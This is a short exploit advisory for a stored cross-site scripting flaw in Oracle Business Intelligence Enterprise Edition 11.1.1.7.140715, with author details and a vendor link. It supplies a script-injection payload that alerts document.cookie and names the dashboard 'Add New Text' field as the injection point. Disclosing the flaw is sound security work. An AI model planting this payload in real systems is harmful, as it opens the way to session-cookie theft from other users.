Oracle Business Intelligence Enterprise Edition version 11.1.1.7.140715 suffers from a persistent cross site scripting vulnerability.
9a0ea5d6b9c7d58cdb8fd2919eda39f3e060c79f7712a12893f648ebc7ebd1bd
# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
# Exploit Author: omurugur
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
# Version: 11.1.1.7.140715
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
Stored XSS:
“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}
Vulnerable area = Dashboard - Add New Text